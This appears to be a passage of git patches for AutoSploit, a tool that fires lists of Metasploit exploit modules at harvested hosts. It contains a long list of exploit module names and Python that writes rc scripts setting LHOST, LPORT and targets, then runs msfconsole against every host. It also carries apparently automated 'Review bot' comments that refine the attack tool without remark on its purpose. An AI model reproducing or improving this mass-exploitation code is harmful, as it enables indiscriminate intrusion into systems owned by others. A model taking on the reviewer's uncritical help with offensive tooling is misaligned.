+ "exploit/multi/http/ajaxplorer_checkinstall_exec", + "exploit/multi/http/apache_activemq_upload_jsp", + "exploit/unix/webapp/wp_lastpost_exec", + "exploit/unix/webapp/wp_mobile_detector_upload_execute", + "exploit/multi/http/axis2_deployer", + "exploit/unix/webapp/wp_foxypress_upload", + "exploit/linux/http/tr064_ntpserver_cmdinject", + "exploit/linux/misc/quest_pmmasterd_bof", + "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload", + "exploit/unix/webapp/php_xmlrpc_eval", + "exploit/unix/webapp/wp_admin_shell_upload", + "exploit/linux/http/sophos_wpa_sblistpack_exec", + "exploit/linux/local/sophos_wpa_clear_keys", + "exploit/multi/http/zpanel_information_disclosure_rce", + "auxiliary/admin/cisco/cisco_asa_extrabacon", + "auxiliary/admin/cisco/cisco_secure_acs_bypass", + "auxiliary/admin/cisco/vpn_3000_ftp_bypass", + "exploit/bsdi/softcart/mercantec_softcart ", + "exploit/freebsd/misc/citrix_netscaler_soap_bof", + "exploit/freebsd/samba/trans2open", + "exploit/linux/ftp/proftp_sreplace ", + "exploit/linux/http/dcos_marathon", + "exploit/linux/http/f5_icall_cmd", + "exploit/linux/http/fritzbox_echo_exec", + "exploit/linux/http/gitlist_exec", + "exploit/linux/http/goautodial_3_rce_command_injection", + "exploit/linux/http/ipfire_bashbug_exec", + "exploit/linux/http/ipfire_oinkcode_exec", + "exploit/linux/http/ipfire_proxy_exec", + "exploit/linux/http/kaltura_unserialize_rce", + "exploit/linux/http/lifesize_uvc_ping_rce", + "exploit/linux/http/nagios_xi_chained_rce", + "exploit/linux/http/netgear_dgn1000_setup_unauth_exec", + "exploit/linux/http/netgear_wnr2000_rce ", + "exploit/linux/http/nuuo_nvrmini_auth_rce", + "exploit/linux/http/nuuo_nvrmini_unauth_rce", + "exploit/linux/http/op5_config_exec", + "exploit/linux/http/pandora_fms_exec", + "exploit/linux/http/pineapple_preconfig_cmdinject", + "exploit/linux/http/seagate_nas_php_exec_noauth", + "exploit/linux/http/symantec_messaging_gateway_exec", + "exploit/linux/http/trendmicro_imsva_widget_exec", + 
"exploit/linux/http/trueonline_billion_5200w_rce", + "exploit/linux/http/trueonline_p660hn_v1_rce", + "exploit/linux/http/trueonline_p660hn_v2_rce", + "exploit/linux/http/vcms_upload", + "exploit/linux/misc/lprng_format_string", + "exploit/linux/misc/mongod_native_helper", + "exploit/linux/misc/ueb9_bpserverd", + "exploit/linux/mysql/mysql_yassl_getname", + "exploit/linux/pop3/cyrus_pop3d_popsubfolders", + "exploit/linux/postgres/postgres_payload", + "exploit/linux/pptp/poptop_negative_read", + "exploit/linux/proxy/squid_ntlm_authenticate", + "exploit/linux/samba/lsa_transnames_heap", + "exploit/linux/samba/setinfopolicy_heap", + "exploit/linux/samba/trans2open", + "exploit/multi/elasticsearch/script_mvel_rce", + "exploit/multi/elasticsearch/search_groovy_script", + "exploit/multi/http/atutor_sqli", + "exploit/multi/http/axis2_deployer", + "exploit/multi/http/familycms_less_exe", + "exploit/multi/http/freenas_exec_raw", + "exploit/multi/http/gestioip_exec", + "exploit/multi/http/glassfish_deployer", + "exploit/multi/http/glpi_install_rce", + "exploit/multi/http/joomla_http_header_rce ", + "exploit/multi/http/makoserver_cmd_exec", + "exploit/multi/http/novell_servicedesk_rc", + "exploit/multi/http/oracle_reports_rce", + "exploit/multi/http/php_utility_belt_rce", + "exploit/multi/http/phpfilemanager_rce", + "exploit/multi/http/phpmyadmin_3522_backdoor", + "exploit/multi/http/phpwiki_ploticus_exec", + "exploit/multi/http/processmaker_exec", + "exploit/multi/http/rails_actionpack_inline_exec", + "exploit/multi/http/rails_dynamic_render_code_exec", + "exploit/multi/http/rails_secret_deserialization", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/simple_backdoors_exec", + "exploit/multi/http/spree_search_exec", + "exploit/multi/http/spree_searchlogic_exec", + "exploit/multi/http/struts2_rest_xstream", + "exploit/multi/http/struts_code_exec", + "exploit/multi/http/struts_code_exec_classloader", + 
"exploit/multi/http/struts_code_exec_parameters", + "exploit/multi/http/struts_dev_mode", + "exploit/multi/http/sysaid_auth_file_upload", + "exploit/multi/http/tomcat_jsp_upload_bypass", + "exploit/multi/http/vtiger_install_rce", + "exploit/multi/http/werkzeug_debug_rce", + "exploit/multi/http/zemra_panel_rce", + "exploit/multi/http/zpanel_information_disclosure_rce", + "exploit/multi/ids/snort_dce_rpc", + "exploit/multi/misc/batik_svg_java", + "exploit/multi/misc/pbot_exec", + "exploit/multi/misc/veritas_netbackup_cmdexec", + "exploit/multi/mysql/mysql_udf_payload", + "exploit/multi/php/php_unserialize_zval_cookie", + "exploit/unix/http/freepbx_callmenum", + "exploit/unix/http/lifesize_room", + "exploit/unix/http/pfsense_clickjacking", + "exploit/unix/http/pfsense_group_member_exec", + "exploit/unix/http/tnftp_savefile", + "exploit/unix/misc/polycom_hdx_traceroute_exec", + "exploit/unix/webapp/awstats_migrate_exec", + "exploit/unix/webapp/carberp_backdoor_exec", + "exploit/unix/webapp/citrix_access_gateway_exec", + "exploit/unix/webapp/dogfood_spell_exec", + "exploit/unix/webapp/invision_pboard_unserialize_exec", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce", + "exploit/unix/webapp/mybb_backdoor", + "exploit/unix/webapp/opensis_modname_exec", + "exploit/unix/webapp/oscommerce_filemanager", + "exploit/unix/webapp/piwik_superuser_plugin_upload", + "exploit/unix/webapp/tikiwiki_upload_exec", + "exploit/unix/webapp/webtester_exec", + "exploit/unix/webapp/wp_phpmailer_host_header", + "exploit/unix/webapp/wp_total_cache_exec", + "exploit/windows/antivirus/symantec_endpoint_manager_rce", + "exploit/windows/http/ektron_xslt_exec", + "exploit/windows/http/ektron_xslt_exec_ws", + "exploit/windows/http/geutebrueck_gcore_x64_rce_bo", + "exploit/windows/http/hp_autopass_license_traversal", + "exploit/windows/http/manage_engine_opmanager_rce", + "exploit/windows/http/netgear_nms_rce", + "exploit/windows/http/sepm_auth_bypass_rce", + 
"exploit/windows/http/trendmicro_officescan_widget_exec",
+ "exploit/windows/iis/iis_webdav_upload_asp",
+ "exploit/windows/iis/msadc",
+ "exploit/windows/misc/manageengine_eventlog_analyzer_rce",
+ "exploit/windows/novell/file_reporter_fsfui_upload",
+ "exploit/windows/scada/ge_proficy_cimplicity_gefebt",
+ "exploit/windows/smb/ipass_pipe_exec",
+ "exploit/windows/smb/smb_relay",
+ "auxiliary/sqli/oracle/jvm_os_code_10g",
+ "auxiliary/sqli/oracle/jvm_os_code_11g",
+ "auxiliary/fuzzers/dns/dns_fuzzer",
+ "auxiliary/fuzzers/ftp/client_ftp",
+ "auxiliary/fuzzers/ftp/ftp_pre_post",
+ "auxiliary/fuzzers/http/http_form_field",
+ "auxiliary/fuzzers/http/http_get_uri_long",
+ "auxiliary/fuzzers/http/http_get_uri_strings",
+ "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer",
+ "auxiliary/fuzzers/smb/smb2_negotiate_corrupt",
+ "auxiliary/fuzzers/smb/smb_create_pipe",
+ "auxiliary/fuzzers/smb/smb_create_pipe_corrupt",
+ "auxiliary/fuzzers/smb/smb_negotiate_corrupt ",
+ "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt",
+ "auxiliary/fuzzers/smb/smb_tree_connect",
+ "auxiliary/fuzzers/smb/smb_tree_connect_corrupt",
+ "auxiliary/fuzzers/smtp/smtp_fuzzer",
+ "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt",
+ "auxiliary/fuzzers/ssh/ssh_version_15",
+ "auxiliary/fuzzers/ssh/ssh_version_2",
+ "auxiliary/fuzzers/ssh/ssh_version_corrupt",
+ "auxiliary/fuzzers/tds/tds_login_corrupt",
+ "auxiliary/fuzzers/tds/tds_login_username"
 ]
 }
diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py
index 3525e5f..7836e92 100644
--- a/lib/exploitation/exploiter.py
+++ b/lib/exploitation/exploiter.py
@@ -1,6 +1,16 @@
+import datetime
+import csv
+import re
+from os import (
+ makedirs,
+ path,
+ linesep
+)
+
 import lib.settings
 import lib.output
+
 def whitelist_wash(hosts, whitelist_file):
 """
 remove IPs from hosts list that do not appear in WHITELIST_FILE
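Review bot: Several entries keep trailing whitespace inside the quoted module name after the `;exploit` suffix was dropped, e.g. `"exploit/freebsd/http/watchguard_cmd_exec "` and `"auxiliary/fuzzers/smb/smb_negotiate_corrupt "`; start_exploit strips them before use, but cleaning the list is the moment to remove them so entries compare equal. Duplicates are also carried over — `exploit/multi/http/zpanel_information_disclosure_rce` and `exploit/multi/http/rocket_servergraph_file_requestor_rce` each appear several times — which runs the same module repeatedly against every host. `"exploit/multi/http/novell_servicedesk_rc"` next to the existing `"exploit/multi/http/novell_servicedesk_rce"` looks like a truncated name inherited from the old list; worth checking against the framework's module index.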
@@ -55,22 +65,95 @@ def start_exploit(self):
 start the exploit, there is still no rollover but it's being worked
 """
 # TODO:/ fix the rollover issue here
- template = (
- "sudo {} {} -x 'workspace -a {}; "
- "setg LHOST {}; setg LPORT {}; setg VERBOSE "
- "true; setg THREADS 100; set RHOST {}; set RHOSTS {}; use {} -j;'"
- )
+
+ today_printable = datetime.datetime.today().strftime("%Y-%m-%d_%Hh%Mm%Ss")
+ current_run_path = path.join(lib.settings.RC_SCRIPTS_PATH, today_printable)
+ makedirs(current_run_path)
+
+ report_path = path.join(current_run_path, "report.csv")
+ with open(report_path, 'w') as f:
+ csv_file = csv.writer(f, quoting=csv.QUOTE_ALL)
+ csv_file.writerow(['Target Host',
+ 'Date (UTC)',
+ 'MSF Module',
+ "LocalHost",
+ "Listening Port",
+ "Successful Logs",
+ "Failure Logs",
+ "All Logs"])
+
 for host in self.hosts:
+ current_host_path = path.join(current_run_path, host.strip())
+ makedirs(current_host_path)
+
 for mod in self.mods:
 lib.output.info(
 "launching exploit '{}' against host '{}'".format(
 mod.strip(), host.strip()
 )
 )
- template = template.format(
- "ruby" if self.ruby_exec else "",
- self.msf_path if self.msf_path is not None else "msfconsole",
- self.configuration[0], self.configuration[1], self.configuration[2],
- host.strip(), host.strip(), mod.strip()
+ cmd_template = (
+ "sudo {use_ruby} {msf_path} -r {rc_script_path} -q"
+ )
+
+ use_ruby = "ruby" if self.ruby_exec else ""
+ msf_path = self.msf_path if self.msf_path is not None else "msfconsole"
+
+
+
+ # What's the point of having a workspace if you overwrite it every fucking time..
+ rc_script_template = (
+ "workspace -a {workspace}\n"
+ "use {module_name}\n"
+ "setg lhost {lhost}\n"
+ "setg lport {lport}\n"
+ "setg verbose true\n"
+ "setg threads 20\n"
+ "set rhost {rhost}\n"
+ "set rhosts {rhosts}\n"
+ "run\n"
+ "exit\n"
 )
- lib.settings.cmdline(template)
+
+ module_name=mod.strip()
+ workspace=self.configuration[0]
+ lhost=self.configuration[1]
+ lport=self.configuration[2]
+ rhost=host.strip()
+
+ current_rc_script_path = path.join(current_host_path, mod.replace("/", '-').strip())
+ with open(current_rc_script_path, 'w') as f:
+
+ f.writelines(rc_script_template.format(
+ module_name=module_name,
+ workspace=workspace,
+ lhost=lhost,
+ lport=lport,
+ rhost=rhost,
+ rhosts=rhost
+ ))
+
+ with open(report_path, 'a') as f:
+
+ cmd = cmd_template.format(
+ use_ruby=use_ruby,
+ msf_path=msf_path,
+ rc_script_path=current_rc_script_path
+ )
+
+ output = lib.settings.cmdline(cmd)
+
+ ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
+ msf_output_lines = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)])
+ msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x)])
+ msf_fails = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[-\]', x)])
+
+ csv_file = csv.writer(f, quoting=csv.QUOTE_ALL)
+ csv_file.writerow([rhost,
+ today_printable,
+ module_name,
+ lhost,
+ lport,
+ msf_wins,
+ msf_fails,
+ msf_output_lines])
diff --git a/lib/settings.py b/lib/settings.py
index a6a91fd..2baac3a 100644
--- a/lib/settings.py
+++ b/lib/settings.py
@@ -7,7 +7,10 @@ import getpass
 import tempfile
 import distutils.spawn
-# import subprocess
+from subprocess import (
+ PIPE,
+ Popen
+)
 import psutil
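Review bot: The report column is labelled 'Date (UTC)' but `today_printable` comes from `datetime.datetime.today()`, which is local time; use `datetime.datetime.utcnow()` so the header is true (the run directory name changes with it). `path.join(current_run_path, host.strip())` turns a line from the hosts file into a directory name, so an entry containing `/` or `..` creates the host directory and rc script outside the run directory — validate the host string (IP/hostname characters only) or give it the same `replace("/", "-")` treatment `mod` gets before building the path. The regex literals `'\[.\]'`, `'\[\+\]'` and `'\[-\]'` should be raw strings, and `ansi_escape = re.compile(...)` is recompiled on every host/module iteration — hoist both above the `for host in self.hosts:` loop. `f.writelines(rc_script_template.format(...))` iterates the string character by character; `f.write(...)` is the intended call. The signature and first lines of start_exploit are outside the hunk.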
@@ -28,6 +31,8 @@ # one bash script to rule them all takes an argument via the operating system START_SERVICES_PATH = "{}/etc/scripts/start_services.sh".format(CUR_DIR) +RC_SCRIPTS_PATH = "{}/autosploit_out/".format(CUR_DIR) + # path to the file that will contain our query QUERY_FILE_PATH = tempfile.NamedTemporaryFile(delete=False).name @@ -166,14 +171,19 @@ def cmdline(command): I intend to have the issue resolved by Version 1.5.0. """ - os.system(command) - '''process = subprocess.call( - args=" ".join(command), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - shell=True - ) - return process''' + #os.system(command) + lib.output.info("Executing command '{}'".format(command.strip())) + split_cmd = [x.strip() for x in command.split(" ") if x] + + sys.stdout.flush() + + proc = Popen(split_cmd, stdout=PIPE, bufsize=1) + stdout_buff = [] + for stdout_line in iter(proc.stdout.readline, b''): + stdout_buff += [stdout_line.rstrip()] + print("(msf)>> {}".format(stdout_line).rstrip()) + + return stdout_buff def check_for_msf(): From 68b354acefacd440cb461a3c9bfa0a609f144918 Mon Sep 17 00:00:00 2001 From: Christian B Date: Tue, 3 Apr 2018 20:01:25 +0200 Subject: [PATCH 27/31] added execute permission to start_services (#118) --- etc/scripts/start_services.sh | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 etc/scripts/start_services.sh diff --git a/etc/scripts/start_services.sh b/etc/scripts/start_services.sh old mode 100644 new mode 100755 From f0880ac25fd645c63f7948f0b9e5735eef175c46 Mon Sep 17 00:00:00 2001 From: Ekultek Date: Tue, 3 Apr 2018 14:53:55 -0500 Subject: [PATCH 28/31] bumping version number --- lib/banner.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/banner.py b/lib/banner.py index 6f14683..4e33e4d 100644 --- a/lib/banner.py +++ b/lib/banner.py @@ -1,7 +1,7 @@ import os import random -VERSION = "2.0" +VERSION = "2.1" def banner_1(line_sep="#--", space=" " * 30): 
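Review bot: `cmdline` never waits on `proc` after draining its stdout, so the child's exit status is never checked and a failed msfconsole run (non-zero exit, or errors on stderr, which is not captured at all) is indistinguishable from a clean one to the caller that grades the run from the returned lines; add `proc.wait()` after the `for stdout_line` loop and surface `proc.returncode` (at least via `lib.output.warning`), and consider `stderr=STDOUT` (adding `STDOUT` to the `from subprocess import (...)` list in hunk `@@ -7,7 +7,10 @@`) if error lines should reach the report. `split_cmd = [x.strip() for x in command.split(" ") if x]` breaks on any argument containing a space, and `RC_SCRIPTS_PATH` in hunk `@@ -28,6 +31,8 @@` is derived from `CUR_DIR`, so a checkout under a directory with a space in its name yields a wrong `-r` path; `split_cmd = shlex.split(command)` with `import shlex` handles quoting correctly. The commented-out `#os.system(command)` line and the docstring sentence about resolving the issue by Version 1.5.0 (visible as context) are stale now that the subprocess path is the real implementation and should be dropped. The `def cmdline(command):` line and the rest of its docstring lie above this hunk.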
From 2240493f154d54e896eb1f6f90c097b1583d8c96 Mon Sep 17 00:00:00 2001 From: ekultek Date: Tue, 3 Apr 2018 15:09:09 -0500 Subject: [PATCH 29/31] minor updates for prep branch --- README.md | 4 +++- lib/cmdline/cmd.py | 2 +- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cf758ea..1e35ae6 100644 --- a/README.md +++ b/README.md @@ -72,7 +72,7 @@ As of version 2.0 AutoSploit can be started with a number of command line argume ``` usage: python autosploit.py -[c|z|s|a] -[q] QUERY - [-C] WORKSPACE LHOST LPORT [-e] + [-C] WORKSPACE LHOST LPORT [-e] [--whitewash] PATH [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT @@ -116,6 +116,7 @@ misc arguments: this --msf-path MSF-PATH pass the path to your framework if it is not in your ENV PATH + --whitelist PATH only exploit hosts listed in the whitelist file ``` ## Installation @@ -128,6 +129,7 @@ chmod +x install.sh ``` ## Dependencies +_Note_: All dependencies should be installed using the above installation method, however, if you find they are not: AutoSploit depends on the following Python2.7 modules. diff --git a/lib/cmdline/cmd.py b/lib/cmdline/cmd.py index 55425a2..44e55a4 100644 --- a/lib/cmdline/cmd.py +++ b/lib/cmdline/cmd.py @@ -26,7 +26,7 @@ def optparser(): parser = argparse.ArgumentParser( usage="python autosploit.py -[c|z|s|a] -[q] QUERY\n" - "{spacer}[-C] WORKSPACE LHOST LPORT [-e]\n" + "{spacer}[-C] WORKSPACE LHOST LPORT [-e] [--whitewash] PATH\n" "{spacer}[--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH\n" "{spacer}[--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT".format( spacer=" " * 28 From 54ec23823ebdbf6987c1da1356128dea91d03ec5 Mon Sep 17 00:00:00 2001 From: ekultek Date: Tue, 3 Apr 2018 15:21:10 -0500 Subject: [PATCH 30/31] added a try, except block --- lib/cmdline/cmd.py | 23 +++++++++++++---------- 1 file changed, 13 insertions(+), 10 deletions(-) 
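Review bot: The usage banner in this hunk advertises the new option as `[--whitewash] PATH`, while the README help table added in the same commit documents it as `--whitelist PATH` and the exploitation code reads the attribute `opt.whitelist`; one of the two spellings is wrong, and the usage line is what a user sees first, so unless the parser really defines `--whitewash` it should read `"{spacer}[-C] WORKSPACE LHOST LPORT [-e] [--whitelist] PATH\n"`. The argument definitions themselves are outside this hunk, so which spelling the parser actually accepts cannot be confirmed here.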
diff --git a/lib/cmdline/cmd.py b/lib/cmdline/cmd.py index 44e55a4..c5b8185 100644 --- a/lib/cmdline/cmd.py +++ b/lib/cmdline/cmd.py @@ -162,13 +162,16 @@ def single_run_args(opt, keys, loaded_modules): keys["censys"][1], keys["censys"][0], opt.searchQuery, proxy=headers[0], agent=headers[1] ).censys() if opt.startExploit: - hosts = open(lib.settings.HOST_FILE).readlines() - if opt.whitelist: - hosts = lib.exploitation.exploiter.whitelist_wash(hosts, whitelist_file=opt.whitelist) - lib.exploitation.exploiter.AutoSploitExploiter( - opt.msfConfig, - loaded_modules, - hosts, - ruby_exec=opt.rubyExecutableNeeded, - msf_path=opt.pathToFramework - ).start_exploit() + try: + hosts = open(lib.settings.HOST_FILE).readlines() + if opt.whitelist: + hosts = lib.exploitation.exploiter.whitelist_wash(hosts, whitelist_file=opt.whitelist) + lib.exploitation.exploiter.AutoSploitExploiter( + opt.msfConfig, + loaded_modules, + hosts, + ruby_exec=opt.rubyExecutableNeeded, + msf_path=opt.pathToFramework + ).start_exploit() + except KeyboardInterrupt: + lib.output.warning("user aborted scan") From 8a1c05a49d23add552bf43db109f1f912ea02377 Mon Sep 17 00:00:00 2001 From: Ekultek Date: Tue, 3 Apr 2018 15:35:59 -0500 Subject: [PATCH 31/31] minor update to the README --- README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 1e35ae6..71cbffd 100644 --- a/README.md +++ b/README.md @@ -33,7 +33,8 @@ Installing AutoSploit is very simple, you can find the latest stable release [he sudo -s << EOF git clone https://github.com/NullArray/Autosploit.git cd AutoSploit -pip2 install -r requirements.txt +chmod +x install.sh +./install.sh python2 autosploit.py EOF ``` @@ -43,6 +44,9 @@ EOF ```bash sudo -s << EOF git clone https://github.com/NullArray/AutoSploit.git +cd AutoSploit +chmod +x install.sh +./installsh cd AutoSploit/Docker docker network create -d bridge haknet docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres
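Review bot: `hosts = open(lib.settings.HOST_FILE).readlines()` inside the new `try` block still leaves the file handle open; rewrite it as `with open(lib.settings.HOST_FILE) as host_file:` / `hosts = host_file.readlines()`. The added `except KeyboardInterrupt:` only covers an interactive abort, so a missing or unreadable hosts file still escapes as an `IOError` traceback from the same `open` call; if that is meant to be a user-facing condition, catch it alongside and report the path with `lib.output.warning`. Because the abort is logged but swallowed, `single_run_args` returns normally after Ctrl-C, so any caller that proceeds to further actions will continue as if the exploitation finished, which may or may not be intended and is worth a comment on the `except` branch. `def single_run_args(opt, keys, loaded_modules):` begins above this hunk.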